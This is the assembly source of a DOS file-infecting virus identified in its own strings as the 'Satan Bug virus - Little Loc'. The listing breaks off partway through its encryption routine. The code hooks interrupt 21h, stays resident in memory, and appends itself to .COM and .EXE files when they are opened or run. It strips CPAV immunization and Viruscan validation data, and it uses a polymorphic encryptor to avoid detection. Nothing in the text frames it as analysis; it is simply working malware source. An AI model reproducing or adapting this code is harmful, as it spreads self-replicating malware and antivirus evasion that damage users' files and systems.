CSEG SEGMENT
     ASSUME CS:CSEG, ES:CSEG, SS:CSEG
     ORG 100H
YES     EQU 1
NO      EQU 0
COM     EQU 0
EXE     EQU 1
Signal  EQU 0F9H
Reply   EQU 0AC0AH

;               


Start:  CALL $+3  
        POP AX
        MOV CL,4H
        SHR AX,CL
        SUB AX,0010H
        MOV CX,CS
        ADD AX,CX
        PUSH AX
        MOV AX,OFFSET Begin
        PUSH AX
        RETF
JJumpFile:JMP JumpFile
Begin:  PUSH DS
BeginC: POP WORD PTR CS:[FileDS]        ;Save DS
        PUSH CS
        POP DS
        CMP BYTE PTR DS:[File],COM      ;Are we in a .COM file?
        JNE NoBytes
        MOV AX,DS:[Bytes]               ;Restore first 3 Bytes of program
        MOV WORD PTR ES:[100H],AX
        MOV AX,DS:[Bytes+2H]
        MOV WORD PTR ES:[102H],AX
NoBytes:PUSH CS                         
        POP ES
        MOV AH,Signal                   
        INT 21H                         ;Check if we're already in memory
        CMP AX,Reply
        JE JJumpFile
        CMP BYTE PTR DS:[CommandCom],YES  ;Are we in Command.COM
        JE NoEnv
        MOV ES,DS:[FileDS]
        MOV ES,ES:[002CH]
        XOR DI,DI
        MOV SI,OFFSET Comspec
        MOV CX,OFFSET Comspec@-OFFSET Comspec
        CLD
        REPE CMPSB                        ;Look for COMSPEC=
        JNE JJumpFile
        XOR AX,AX
        MOV CX,0080
        CLD
        REPNE SCASB
        JNE JJumpFile
        MOV CX,000CH
        SUB DI,CX
        CLD
        REP CMPSB               ;COMSPEC must equil COMMAND.COM
        JNE JJumpFile
NoEnv:  PUSH CS
        POP ES
        MOV AX,DS:[FileDS]         ;Segment of our current MCB
        DEC AX
MCBLoop:MOV DS,AX
        CMP BYTE PTR DS:[0H],'Z'   ;Last MCB?
        JNE JJumpFile
MCBEnd: MOV AX,(OFFSET Done-OFFSET Start)*2  ;Reserve enough for encryption
        ADD AX,3072
        MOV CL,4H
        SHR AX,CL
        INC AX
        SUB WORD PTR DS:[0003H],AX           ;Subtract it from MCB.size
        XOR BX,BX
        MOV ES,BX
        SHR AX,CL
        SHR CL,1H
        SHR AX,CL
        INC AX
        SUB WORD PTR ES:[413H],AX            ;Subtract it from Interrupt 12H
        MOV AX,DS:[0003H]
        MOV BX,DS
        INC BX
        ADD AX,BX
        SUB AX,0010H
        MOV DI,100H
        MOV SI,DI
        MOV ES,AX
        PUSH CS
        POP DS
        MOV CX,OFFSET Vend-OFFSET Start
        CLD
        REP MOVSB                            ;Copy us to high memory
        PUSH ES
        MOV AX,OFFSET HighCode
        PUSH AX
        RETF                                 ;Jump to high memory
JumpFile:CMP BYTE PTR CS:[File],COM
        MOV ES,CS:[FileDS]                   ;Restore Segments
        MOV DS,CS:[FileDS]
        JNE JumpEXE
        MOV AX,100H
        PUSH DS
        PUSH AX
        XOR AX,AX
        XOR BX,BX
        RETF
JumpEXE:MOV AX,DS
        ADD AX,0010H
        PUSH AX
        ADD AX,CS:[EXECS]
        MOV WORD PTR CS:[JumpDat+3H],AX
        MOV AX,CS:[EXEIP]
        MOV WORD PTR CS:[JumpDat+1H],AX
        POP AX
        ADD AX,CS:[EXESS]
        CLI
        MOV SS,AX
        MOV SP,CS:[EXESP]
        XOR AX,AX
        XOR BX,BX
        STI
        JMP SHORT JumpDat
JumpDat:DB 0EAH,00H,00H,00H,00H

HighCode:PUSH CS
        POP DS
        MOV BYTE PTR DS:[Busy_Flag],No       ;initialize Flag
        MOV AX,3521H                         ;Hook interrupt 21
        INT 21H
        MOV WORD PTR DS:[Vector21],BX        ;Save Vector
        MOV WORD PTR DS:[Vector21+2H],ES
        PUSH CS
        POP ES
        MOV DI,OFFSET JumpHandle
        MOV DX,DI
        MOV AL,0EAH                          ;Make jump to our handle
        CLD
        STOSB
        MOV AX,OFFSET Handle21
        CLD
        STOSW
        MOV AX,CS
        CLD
        STOSW
        MOV AX,2521H                         ;Point Interrupt 21 to Jump
        INT 21H
        JMP JumpFile                         ;Return to program


IDText:         DB 'Satan Bug virus - Little Loc',0H


File            DB ?            ;Current File: .COM = 0, .EXE = 1
CommandCom      DB ?            ; = YES If in COMMAND.COM
Bytes           DD ?            ;Bytes replaced with jump in .COM files
Comspec         DB 'COMSPEC='
Comspec@:
Command         DB 'COMMAND.COM',0H
Command@:       
EXESP           DW ?              ;.EXE SP
EXESS           DW ?              ;.EXE SS Displacement
EXECS           DW ?              ;.EXE CS Displacement
EXEIP           DW ?              ;.EXE IP
RANDOM          DW ?              ;Random Number
LAST            DW ?              ;Random Number Data
Immune:         DB 22H,19H,35H,93H,59H,57H,54H,80H   ;CPAV's Immune I.D.
Validate:       DB 0F1H,0FEH,0C6H,0ABH,0H,0F1H       ;Scan's Validation I.D.
Validate@:
ImmuneJumpExe:  DB 0E9H,8CH,01H        ;Write to .EXE's immunized with CPAV
ImmuneJumpCom:  DB 0E9H,75H,01H        ;Write to .COM's immunized with CPAV

Handle21Pall:POP ES           ;POP REGS  (They were pushed in the decryption)
        POP DS
        POP BP
        POP SI
        POP DI
        POP DX
        POP CX
        POP BX
        POP AX
Handle21:CMP BYTE PTR CS:[Busy_Flag],Yes  ;If Flag set skip
        JNE Handle21SF
        JMP CS:Vector21
Handle21SF:MOV BYTE PTR CS:[Busy_Flag],Yes  ;Set Flag
        CMP AH,3DH          ;Open?
        JE Open
        CMP AH,4BH           ;Execute?
        JE Execute
        CMP AH,6CH           ;Extended open?
        JE ExtOpen
        CMP AH,Signal        ;Signal?
        JNE Jump21
        MOV AX,Reply         ;Tell other that we're already here
        MOV BYTE PTR CS:[ReturnFar],YES    ;Used later
        JMP JumpEM
Jump21: MOV BYTE PTR CS:[ReturnFar],NO     ;Used Later
        JMP JumpEM

Open:   MOV WORD PTR CS:[FileSeg],DX            
        MOV WORD PTR CS:[FileSeg+2H],DS    ;Save SEG:OFF of file
        JMP InfStart
Execute:CMP AL,03H
        JBE Open
        JMP Jump21
ExtOpen:MOV WORD PTR CS:[FileSeg],SI       ;Save SEG:OFF of file
        MOV WORD PTR CS:[FileSeg+2H],DS
InfStart:PUSH AX                           ;Save All Regs
        PUSH BX
        PUSH CX
        PUSH DX
        PUSH DI
        PUSH SI
        PUSH BP
        PUSH DS
        PUSH ES
        CALL Infect                        ;Infect the file
        MOV BYTE PTR DS:[ReturnFar],NO     ;Used Later 
        POP ES
        POP DS
        POP BP
        POP SI
        POP DI
        POP DX
        POP CX
        POP BX
        POP AX
JumpEM: MOV BYTE PTR CS:[Memory],YES       ;Tell encryption that we need
        JMP MemBuild                       ;to be encrypted in memory

Infect: CALL Which                         ;Determine if file is .EXE, .COM
        CMP AL,COM                         ; or other
        JNE MaybeEXE
        CALL InfCOM                        ;Infect .COM
        RETN
MaybeEXE:CMP AL,EXE
        JNE InfectRet
        CALL InfEXE                        ;Infect .EXE
InfectRet:RETN

JWhichRetNone:JMP WhichRetNone

Which:  PUSH CS                         
        POP DS
        MOV WORD PTR DS:[JumpHandle+1H],OFFSET Handle21  ;Point handle at us
        MOV BYTE PTR DS:[Opened],NO                      ; not decryption
        MOV BYTE PTR DS:[Attribute],NO
        MOV BYTE PTR DS:[Infected],NO
        MOV BYTE PTR DS:[CommandCom],NO
        MOV AX,2F00H                                     ;Get DTA SEG:OFF
        CALL Call21
        MOV WORD PTR DS:[DTA],BX
        MOV WORD PTR DS:[DTA+2H],ES                      ;Save it
        PUSH CS
        POP ES
        MOV DX,OFFSET NewDTA
        MOV AX,1A00H
        CALL Call21                                      ;Set to are DTA
        LDS DX,DS:[FileSeg]
        MOV AX,4E00H                                     ;Find the target file 
        MOV CX,0027H
        CALL Call21
        PUSHF
        MOV AX,1A00H                                     ;Reset DTA
        LDS DX,CS:[DTA]
        CALL Call21
        PUSH CS
        POP DS
        POPF
        JB JWhichRetNone
        CMP WORD PTR DS:[NewDTA+1CH],0H                  ;Must be larger then
        JNE WhichNoSize                                  ; 1024 Bytes
        CMP WORD PTR DS:[NewDTA+1AH],1024
        JB JWhichRetNone
WhichNoSize:CMP BYTE PTR DS:[NewDTA+19H],0C8H  ;19xx+100 Years 
        JNB JWhichRetNone
        ADD BYTE PTR DS:[NewDTA+19H],0C8H ;ADD 100 Years to date
        TEST BYTE PTR DS:[NewDTA+15H],01H ;Read Only?
        LDS DX,DS:[FileSeg]
        JE NoAttr
        XOR CX,CX                         ;if yes, set to 0
        MOV AX,4301H
        CALL Call21
        JB WhichRetNone
        MOV BYTE PTR CS:[Attribute],YES   ;Remember that we changed it
NoAttr: MOV AX,3D02H                       ;Open
        CALL Call21
        JB WhichRetNone
        PUSH CS
        POP DS
        MOV BYTE PTR DS:[Opened],YES       ;Remember that we opened it
        MOV BX,AX
        MOV AX,3F00H                       ;Read first 20H bytes
        MOV CX,0020H
        MOV DX,OFFSET First20
        CALL Call21
        JB WhichRetNone
        CMP AX,CX
        JNE WhichRetNone
        CMP WORD PTR DS:[First20],'ZM'     ;Is it an .EXE style program?
        JE WhichRetEXE
        MOV DI,OFFSET NewDTA+1EH               ;Offset of found file
        MOV CX,OFFSET Command@-OFFSET Command
        MOV SI,OFFSET Command
        PUSH DI
        PUSH SI
        CLD
        REP CMPSB                           ;Is it COMMAND.COM?
        POP SI
        POP DI
        JE RetCommand
        MOV CX,14
        XOR AX,AX
        CLD
        REPNE SCASB                        ;Find end of file
        JNE WhichRetNone
        MOV CX,5H                          ;Comp last 5 Bytes
        SUB DI,CX
        ADD SI,0007H
        CLD
        REP CMPSB                          ;Is it an .COM style program?
        JE WhichRetCOM
WhichRetNone:
        CALL Close
        XOR AX,AX
        DEC AX
        RETN
RetCommand:MOV BYTE PTR DS:[CommandCom],YES   ;Remember that this file is
WhichRetCOM:                                  ;  Command.COM
        MOV AL,COM
        MOV BYTE PTR DS:[File],AL
        RETN
WhichRetEXE:    
        MOV AL,EXE
        MOV BYTE PTR DS:[File],AL
        RETN

PositionEnd:
        MOV AX,4202H            ;Set File Pointer to end
        XOR CX,CX
        MOV DX,CX
        CALL Call21
        CMP BYTE PTR DS:[File],COM
        JE NoDivide
        PUSH AX                  ;If .EXE then get Page size and modula data
        PUSH DX
        PUSH CX
        MOV CX,200H
        DIV CX
        INC AX
        CMP WORD PTR DS:[First20+4H],AX     ;Must be right in header or abort
        JNE HeaderError
        CMP WORD PTR DS:[First20+2H],DX
        JNE HeaderError
        POP CX
        POP DX
        POP AX
NoDivide:CALL FindScan                      ;Delete validation data (Viruscan)
        JB PosEndErr
        MOV CX,DX
        MOV DX,AX
        MOV AX,4200H                        ;Set file pointer to beginning
        CALL Call21
        TEST AX,000FH
        JE NoAdjust
        AND AX,0FFF0H                       ;Set to Paragraph
        ADD AX,0010H
        MOV CX,DX
        MOV DX,AX
        MOV AX,4200H
        CALL Call21                          ;at end
NoAdjust:CMP BYTE PTR DS:[File],COM         ;Is it a .COM file
        JNE NoSize
        OR DX,DX
        JNE PosEndErr
        CMP AX,65535-(OFFSET Done-OFFSET Start)-2048  ;.COM's must be < 
        JA PosEndErr
NoSize: MOV WORD PTR DS:[OldFileSize],AX      ;Save original size (for CPAV)  
        MOV WORD PTR DS:[OldFileSize+2H],DX
        MOV BYTE PTR DS:[Memory],NO           ;Tell encryption it's for a
                                              ; file
        CALL Build                      ;Make encrypted copy of us
        MOV AX,4000H                    ;Write it to the file
        CALL Call21
        JB PosEndErr
        MOV BYTE PTR DS:[Infected],YES     ;Remember that this file is Infected
        MOV AX,4201H                      ;4201 DX=CX=0: Get current File Pointer
        XOR CX,CX
        MOV DX,CX
        CALL Call21
        MOV WORD PTR DS:[NewFileSize],AX      ;Remember new file size
        MOV WORD PTR DS:[NewFIleSize+2H],DX   ; (for .EXE header)
        XOR AX,AX
        RETN
HeaderError:POP CX
        POP DX
        POP AX
PosEndErr:XOR AX,AX
        DEC AX
        RETN
PositionStart:
        MOV AX,4200H                    ;AX=4200 CX=DX=0 set pointer to start
        XOR CX,CX
        XOR DX,DX
        CALL Call21
        MOV DX,OFFSET First20
        MOV CX,20H                      ;Read 20H Bytes
        MOV AX,4000H
        CALL Call21
        JB PosStaErr
        XOR AX,AX
        RETN
PosStaErr:XOR AX,AX
        DEC AX
        RETN

FindScan:PUSH AX
        PUSH DX
        SUB AX,75                       ;Validation bytes are in lat 75 Bytes
        MOV CX,DX                       ; of the program (if they're there)
        MOV DX,AX
        MOV AX,4200H
        CALL Call21                     ;Set file position
        MOV DX,OFFSET Encrypt
        MOV CX,75
        MOV AX,3F00H                    ;Read those last 75 Bytes
        CALL Call21
        CMP AX,CX
        JNE ScanErr
        CALL ScanSearch                 ;Are validation bytes here?
        OR AX,AX
        JNE FindRet
        POP DX
        POP AX
        SUB AX,75
        ADD AX,DI
        MOV CX,DX
        MOV DX,AX
        MOV AX,4200H                   ;Set file position to Validation bytes
        CALL Call21
        PUSH AX
        PUSH DX    
        MOV AX,4000H                   ;Overwrite them with Zero
        MOV CX,75
        SUB CX,DI
        MOV DI,OFFSET Decrypt
        MOV DX,DI
        PUSH AX
        PUSH CX
        XOR AX,AX
        CLD
        REP STOSB
        POP CX
        POP AX
        CALL Call21
        JB ScanErr
FindRet:CLC
        POP DX
        POP AX
        RETN
ScanErr:STC
        POP DX
        POP AX
        RETN



ScanSearch:MOV AL,0FFH                 
        CALL ScanDecrypt               ;Decrypt Internal Validation bytes
        MOV SI,OFFSET Validate
        MOV DI,OFFSET Encrypt
        MOV CX,76-(OFFSET Validate@-OFFSET Validate)
        CLD
        LODSB
SearchCont:REPNE SCASB                  ;Find first byte
        JNE SearchNeg
        PUSH SI
        PUSH CX
        CLD
        REP CMPSB                       ;if found then compare rest
        POP CX
        POP SI
        JE SearchYes
        JMP SearchCont
SearchNeg:MOV AL,1H                    ;Encrypt Internal Validation Bytes
        CALL ScanDecrypt
        XOR AX,AX
        DEC AX
        RETN

SearchYes:SUB DI,OFFSET Encrypt 
        SUB DI,CX
        DEC DI                         ;Get offset from encrypt 
        MOV AL,1H                                            
        CALL ScanDecrypt               ;Encrypt Internal Validation Bytes
        XOR AX,AX
        RETN

ScanDecrypt:MOV SI,OFFSET Validate
        MOV CX,OFFSET Validate@-OFFSET Validate
ScanLP: ADD BYTE PTR DS:[SI],AL
        INC SI
        LOOP ScanLP
        RETN

Close:  CMP BYTE PTR DS:[Opened],NO       ;Was it opended?
        JE NoClose
        CMP BYTE PTR DS:[Infected],YES    ;Was it infected
        JNE NoDate
        MOV AX,5701H                      ;then reset date
        MOV CX,DS:[NewDTA+16H]
        MOV DX,DS:[NewDTA+18H]
        CALL Call21
NoDate: MOV AX,3E00H                      ;then close
        CALL Call21
NoClose:CMP BYTE PTR DS:[Attribute],NO    ;Was the attribute changed?
        JE NoSetAttr
        XOR CX,CX
        MOV CL,DS:[NewDTA+15H]
        TEST CL,1H
        JE NoSetAttr
        MOV AX,4301H                      ;then reset it
        LDS DX,DS:[FileSeg]
        CALL Call21
        PUSH CS
        POP DS
NoSetAttr:RETN
      



DisImmune:CMP BYTE PTR DS:[File],EXE    ;Is file .EXE
        JE ExeImmune
        MOV SI,OFFSET First20
        MOV DI,OFFSET ImmuneBytes
        MOV CX,000EH
        CLD
        REP MOVSB                       ;Move header info
        JMP ImmuneComp
ExeImmune:MOV DX,DS:[First20+8H]        ;Size of header
        MOV CL,4H                       ;Change form paragraphs to bytes
        SHL DX,CL
        MOV AX,4200H                    ;set to that position
        XOR CX,CX
        CALL Call21
        MOV AX,3F00H                    ;Read those 10H bytes
        MOV DX,OFFSET ImmuneBytes
        MOV CX,0010H
        CALL Call21
        CMP AX,CX
        JNE DisImmuneNo
ImmuneComp:MOV DI,OFFSET ImmuneBytes+6H
        MOV SI,OFFSET Immune
        MOV CX,0008H                       ;Is CPAV Immune here?
        CLD 
        REP CMPSB
        JNE DisImmuneYes
        CMP BYTE PTR DS:[File],EXE         ;Is file an .EXE
        JNE ImmunePosCom
        JMP ImmunePosExe
DisImmuneNo:XOR AX,AX
        DEC AX
        RETN
DisImmuneYes:XOR AX,AX
        RETN
ImmunePosCom:XOR CX,CX
        MOV DX,DS:[ImmuneBytes+1H]         ;Offset to End of immunization code
        SUB DX,02F0H                       ;Set Offset Start of immunzation code
        MOV AX,4200H                            
        CALL Call21
        JMP ImmuneWrite
ImmunePosExe:XOR AX,AX
        MOV DX,DS:[First20+8H]             ;End of header
        ADD DX,DS:[First20+16H]            ;plus .EXE start offset
        CMP DX,0FFFH
        JB ImmuneNoR
        PUSH DX
        AND DX,0F000H
        MOV AX,DX
        POP DX
        MOV CL,4H
        ROL AX,CL
ImmuneNoR:MOV CL,4H
        SHL DX,CL
        ADD DX,DS:[First20+14H]
        JNB ImmuneNoI
        INC AX
ImmuneNoI:ADD DX,0030H
        JNB ImmuneNoI1
        INC AX
ImmuneNoI1:MOV CX,AX
        MOV AX,4200H
        CALL Call21
ImmuneWrite:MOV AX,4000H                   ;Write jump to code
        MOV CX,0003H
        MOV DX,OFFSET ImmuneJumpCom
        CMP BYTE PTR DS:[File],COM
        JE ImmuneW
        MOV DX,OFFSET ImmuneJumpExe
ImmuneW:CALL Call21
        JB DisImmuneNo
        XOR AX,AX
        RETN

InfCOM: CALL DisImmune
        OR AX,AX
        JNE InfCOMClose
        MOV AX,DS:[First20]                ;Save bytes from CPAV code
        MOV WORD PTR DS:[Bytes],AX
        MOV AX,DS:[First20+2H]
        MOV WORD PTR DS:[Bytes+2H],AX
        CALL PositionEnd                   ;To end of file
        OR AX,AX
        JNE InfCOMClose
        MOV DI,OFFSET First20
        MOV AL,0E9H                        ; 0E9H = JMP xxxx
        CLD
        STOSB
        MOV AX,DS:[OldFileSize]
        SUB AX,0003H                       ;End of file
        CLD
        STOSW
        CALL PositionStart                 ;To start
InfCOMClose:CALL Close
        RETN

InfEXE: CALL DisImmune                     ;Call the anti-CPAV code
        OR AX,AX
        JNE InfEXEClose
        CMP WORD PTR DS:[First20+0CH],-1   ;.EXE must ask for all of memory
        JNE InfEXEClose
        MOV AX,DS:[First20+0EH]            ;Get stack seg displacement
        MOV WORD PTR DS:[EXESS],AX         ;Save it
        MOV AX,DS:[First20+10H]            ;Get Stack Pointer
        MOV WORD PTR DS:[EXESP],AX         ;Save it
        MOV AX,DS:[First20+14H]            ;Get Instruction pointer
        MOV WORD PTR DS:[EXEIP],AX         ;Save it
        MOV AX,DS:[First20+16H]            ;Get Code segment displacement
        MOV WORD PTR DS:[EXECS],AX         ;Save it
        CALL PositionEnd                   ;To end
        OR AX,AX
        JNE InfEXEClose
        CALL FixHeader                     ;Fix .EXE Header
        CALL PositionStart                 ;To start
InfEXEClose:CALL Close
        RETN

FixHeader:MOV AX,DS:[NewFileSize]
        MOV DX,DS:[NewFileSize+2H]
        MOV CX,200H
        DIV CX
        INC AX
        MOV WORD PTR DS:[First20+2H],DX ;Set size in Header to accomendate us
        MOV WORD PTR DS:[First20+4H],AX
        MOV AX,DS:[OldFileSize]
        MOV DX,DS:[First20+8H]
        MOV CL,4H
        SHL DX,CL
        SUB AX,DX                    ;Set IP to us
        MOV WORD PTR DS:[AddSeg],0H
IP_CMP: CMP AX,65535-((OFFSET Done-OFFSET Start)+4096)
        JB NoIPMan
        SUB AX,0010H
        INC WORD PTR DS:[AddSeg]
        JMP SHORT IP_CMP
NoIPMan:MOV WORD PTR DS:[First20+14H],AX
        MOV AX,DS:[OldFileSize+2H]
        CMP AX,000FH
        JA FixError
        XCHG AL,AH
        SHL AX,CL
        ADD AX,DS:[AddSeg]
        MOV WORD PTR DS:[First20+16H],AX
        MOV WORD PTR DS:[First20+0EH],AX
        MOV WORD PTR DS:[First20+10H],0FFFEH
        XOR AX,AX
        RETN
FixError:XOR AX,AX
        DEC AX
        RETN

Call21: PUSHF
        CALL CS:Vector21
        RETN

RND:    PUSH CX
RND1:   PUSH AX
        XOR AX,AX
        MOV DS,AX
        POP AX
        ADD AX,DS:[46CH]
        PUSH CS
        POP DS
        ADD AX,DS:[RANDOM]
        ADD CX,AX
        XCHG AL,AH
        TEST AX,CX
        JE RND2
        TEST CH,CL
        JE RND3
        ADD CX,AX
RND2:   XCHG CL,CH
        SUB CX,AX
        SUB WORD PTR DS:[RANDOM],AX
        CMP WORD PTR DS:[LAST],AX
        JNE RNDRT
        TEST CX,AX
        JNE RND3
        SUB AH,CL
        ADD CX,AX
        TEST AL,CL
        JNE RND3
        TEST WORD PTR DS:[RANDOM],AX
        JE RND3
        SUB CX,AX
RND3:   XCHG AL,AH
        SUB CX,AX
        XCHG CL,CH
        JMP RND1
RNDRT:  MOV WORD PTR DS:[LAST],AX
        POP CX
        RET
RND@:

MemBuild:PUSH AX
        PUSH BX
        PUSH CX
        PUSH DX
        PUSH DI
        PUSH SI
        PUSH BP
        PUSH DS
        PUSH ES
        PUSH CS
        POP ES
        PUSH CS
        POP DS
BUILD:  PUSH BX
        CALL ALTTAB
        MOV DI,OFFSET DECRYPT
        AND DI,0FFF0H
        ADD DI,0010H
        MOV WORD PTR DS:[DOFF],DI
        MOV WORD PTR DS:[EOFF],OFFSET ENCRYPT
        CMP BYTE PTR DS:[Memory],YES
        JE CallMH
        CALL HEAD
        JMP SHORT BUILDL
CallMH: CALL MemHead
BUILDL: CALL RND
        AND AX,001FH
        JE BUILDL
        MOV WORD PTR DS:[ECNT],AX
        MOV WORD PTR DS:[INST],AX
BUILDLP:CALL MAKE
        DEC WORD PTR DS:[ECNT]
        JNE BUILDLP
        CMP BYTE PTR DS:[Memory],YES
        JE CallMT
        CALL BTAIL
        JMP SHORT BuildRet
CallMT: POP AX
        JMP MemTail
BuildRet:POP BX
        RETN
BUILD@:

MAKE:   MOV BX,OFFSET ETAB
        CALL RND
        AND AX,001FH
        SHL AX,1H
        ADD BX,AX
        MOV SI,DS:[BX]
        ADD SI,OFFSET ETAB
        INC SI
        MOV DI,DS:[EOFF]  ;DI=OFFSET OF ENCRYPT+N
        MOV AH,DS:[SI-1H]
        MOV CL,4H
        SHR AH,CL           ;GET INSTRUCTION SIZE
        XOR CX,CX
        MOV CL,AH
        CALL RND
        TEST AX,1H
        JNE NOSWI
        PUSH CX
        PUSH DI
        PUSH SI
        MOV DI,SI
        ADD DI,CX
SWLP:   MOV AL,DS:[DI]
        XCHG DS:[SI],AL
        CLD
        STOSB
        INC SI
        LOOP SWLP
        POP SI
        POP DI
        POP CX
NOSWI:  MOV DL,DS:[SI-1H]
        TEST DL,00001000B
        JE MOVINT
        MOV BX,OFFSET LODSTO
        MOV AL,DS:[BX]
        CLD
        STOSB
        JMP PUTADD
MOVINT: CALL RND
        TEST AL,1H
        JNE PUTADD
        PUSH SI
        ADD SI,CX
        DEC SI
        TEST DL,00000100B
        JNE ROTCL
        DEC SI
        TEST DL,00000010B
        JNE ROTCL
        DEC SI
ROTCL:  TEST DL,1H
        JE ROTIT
        DEC SI
ROTIT:  RCR BYTE PTR DS:[SI],1H
        CMC
        RCL BYTE PTR DS:[SI],1H
        ADD SI,CX
        RCR BYTE PTR DS:[SI],1H
        CMC
        RCL BYTE PTR DS:[SI],1H
        POP SI
PUTADD: TEST DL,00000100B
        JNE NOADD
        PUSH SI
        ADD SI,CX
        DEC SI
        TEST DL,00000010B
        JNE ADBYTE
        CALL RND
        DEC SI
        ADD WORD PTR DS:[SI],AX
        ADD SI,CX
        ADD WORD PTR DS:[SI],AX
        POP SI
        JMP NOADD
ADBYTE: CALL RND
        ADD BYTE PTR DS:[SI],AL
        ADD SI,CX
        ADD BYTE PTR DS:[SI],AL
        POP SI
NOADD:  PUSH CX
        CLD
        REP MOVSB
        POP CX
        TEST DL,00001000B
        JNE PUTSTO
        CALL PUTINC
        JMP MDEC
PUTSTO: MOV AL,DS:[BX+1H]
        CLD
        STOSB
MDEC:   MOV WORD PTR DS:[EOFF],DI
        MOV DI,DS:[DOFF]
        MOV BYTE PTR DS:[FillB],YES
        TEST DL,00001000B
        JE DECMOV
        MOV AL,DS:[BX]
        CLD
        STOSB
        CALL Fill
DECMOV: CLD
        REP MOVSB
        CALL Fill
        TEST DL,00001000B
        JE DECINC
        MOV AL,DS:[BX+1H]
        CLD
        STOSB
        JMP DECRT
DECINC: CALL PUTINC
DECRT:  CALL Fill
        CMP WORD PTR DS:[ECNT],1H
        JNE SAVEDI
        CMP BYTE PTR DS:[Memory],YES
        JNE NoDecJMP
        CALL Fill
        JMP SHORT SaveDI
NoDecJMP:MOV AL,0EBH
        CLD
        STOSB
        XOR AX,AX
        MOV BX,DI
        CLD
        STOSB
        MOV AX,DS:[INST]
        SHL AX,1H
        CMP AX,6H
        JBE SaveDI
        SUB AX,0006H                                                        
        MOV CX,AX
        CALL Fill_NUM
Make_LP:CALL RND
        TEST AL,1H
        JNE MAKE_NI
        INC BYTE PTR DS:[BX]
Make_NI:LOOP Make_LP
SaveDI: MOV WORD PTR DS:[DOFF],DI
        MOV BYTE PTR DS:[FillB],NO
        RETN
MAKE@:  

Fill_NUM:PUSH AX
        PUSH BX
        PUSH CX
        MOV BX,OFFSET FTABLE
FINLP:  CALL RND
        AND AX,000FH
        XLAT
        CLD
        STOSB
        LOOP FINLP
        POP CX
        POP BX
        POP AX
        RETN
Fill_NUM@:

Fill:   PUSH AX
        PUSH BX
        PUSH CX
        CALL RND
        AND AX,001FH
        MOV CX,AX
        JCXZ FILRT
        MOV BX,OFFSET FTABLE
FILP:   CALL RND
        MOV AH,0FH
        CMP BYTE PTR DS:[Memory],YES
        JNE AndEf
        MOV AH,07H
AndEf:  AND AL,AH
        XLAT
        CLD
        STOSB
        LOOP FILP
FILRT:  POP CX
        POP BX
        POP AX
        RETN
Fill@:

FTABLE: NOP
        STC
        CLC
        CMC
        CLD
        STI
        NOP     ;SAHF
        DB 2EH
        DB 3EH
        DB 26H
        INC BX
        DEC BX
        INC DX
        DEC DX
        INC BP
        DEC BP
FTABLE@:

PUTINC: PUSH AX
        PUSH CX
        PUSH SI
        MOV CL,DS:[FillB]
        MOV SI,OFFSET INCDOFF
        CALL RND
        TEST AL,01H
        JE MOVINC
        ADD SI,6H
MOVINC: CLD
        MOVSB
        JCXZ NOFIL1
        CALL Fill7
NOFIL1: CLD
        MOVSB
        JCXZ NOFIL2
        CALL Fill7
NOFIL2: CALL RND
        TEST AL,1H
        JE MOVINC1
        INC SI
        INC SI
        CLD
        MOVSW
        JMP SHORT MOVINCR
MOVINC1:CLD
        MOVSB
        JCXZ NOFIL3
        CALL Fill7
NOFIL3: CLD
        MOVSB
MOVINCR:POP SI
        POP CX
        POP AX
        RETN
PUTINC@:

Fill7:  PUSH AX
        PUSH CX
        CALL RND
        AND AX,0007H
        MOV CX,AX
        JCXZ NOFL7
        CALL Fill_NUM
NOFL7:  POP CX
        POP AX
        RETN
Fill7@:

BTAIL:  MOV SI,OFFSET TOP
        CALL RND
        MOV CX,6H
        TEST AL,1H
        JE TAILMOV
        ADD SI,CX
TAILMOV:CLD 
        REP MOVSB
        MOV AX,DI
        SUB AX,DS:[DEC_START]          ;TELL TAIL WHERE TO JMP
        NEG AX
        MOV WORD PTR DS:[DI-2H],AX
        MOV WORD PTR DS:[DOFF],DI
        MOV BX,DS:[INST]
        SHL BX,1H
        MOV AX,DI
        SUB AX,BX                     ;HOW MUCH OF THE DECRYPTION 
        PUSH AX                       ;  TO ENCRYPT?
        PUSH BX
        MOV BX,OFFSET FTABLE
        XOR DX,DX
TAILSL: TEST DI,000FH
        JE TAILPA
        CALL RND
        AND AX,000FH
        XLAT
        STOSB
        INC DX
        JMP TAILSL
TAILPA: POP BX
        MOV SI,OFFSET Start
        MOV CX,OFFSET Done-OFFSET Start
        CLD
        REP MOVSB
        CALL RND
        AND AX,1H
        ADD DI,AX
        MOV AX,OFFSET DECRYPT
        AND AX,0FFF0H
        ADD AX,0010H
        SUB DI,AX
        MOV WORD PTR DS:[SIZ],DI
        MOV DI,DS:[EOFF]
        MOV BYTE PTR DS:[DI],0C3H
        MOV AX,OFFSET Done-OFFSET Start
        ADD AX,BX
        ADD AX,DX
        XOR DX,DX
        DIV WORD PTR DS:[INST]
        SHR AX,1H
        MOV CX,AX
        INC CX
        MOV DI,DS:[MOVCX]
        MOV WORD PTR DS:[DI],CX
        POP DI
        PUSH DI
        MOV BX,DS:[CALL_OFF]
        SUB DI,BX
        MOV SI,DS:[ADDSI]
        MOV WORD PTR DS:[SI],DI
        POP DI
        MOV SI,DI
TAILE:  MOV AX,OFFSET ENCRYPT
        CALL AX
        LOOP TAILE
        MOV DX,OFFSET DECRYPT
        AND DX,0FFF0H
        ADD DX,0010H
        MOV CX,DS:[SIZ]
        RETN
BTAIL@:

INCDOFF:INC DI
        INC DI
        PUSH DI
        POP SI
        MOV SI,DI

        INC SI
        INC SI
        PUSH SI
        POP DI
        MOV DI,SI
INCDOFF@:



TOP:    DEC CX
        JE TOP1
        JMP Start
TOP1:   DEC CX
        JCXZ TOP@
        JMP Start
TOP@:

HEAD:   MOV BYTE PTR DS:[PUTCLD],NO
        MOV BYTE PTR DS:[PUTCX],NO
        MOV BYTE PTR DS:[FORCE],NO
        MOV BYTE PTR DS:[PUSHED],NO
        MOV BX,OFFSET HOP
        MOV SI,BX
        CALL CALL_EM
        CLD
        MOVSB
        PUSH DI
        XOR AX,AX
        CLD
        STOSW
        MOV WORD PTR DS:[CALL_OFF],DI
        CALL RND
        AND AX,001FH
        MOV CX,AX
        JCXZ HEAD_NCL
        CALL Fill_NUM
HEAD_NCL:CALL PUTCL
        POP AX
        PUSH BX
        MOV BX,AX
        JCXZ HEAD_ZER
HEAD_LP:CALL RND
        TEST AL,1H
        JNE HEAD_NI
        INC BYTE PTR DS:[BX]
HEAD_NI:LOOP HEAD_LP
HEAD_ZER:POP BX
        INC SI
        INC SI
        CALL RND
        AND AX,0001H
        MOV DX,AX
        CLD
        LODSB
        OR AL,DL
        CLD
        STOSB
        CALL CALL_EM
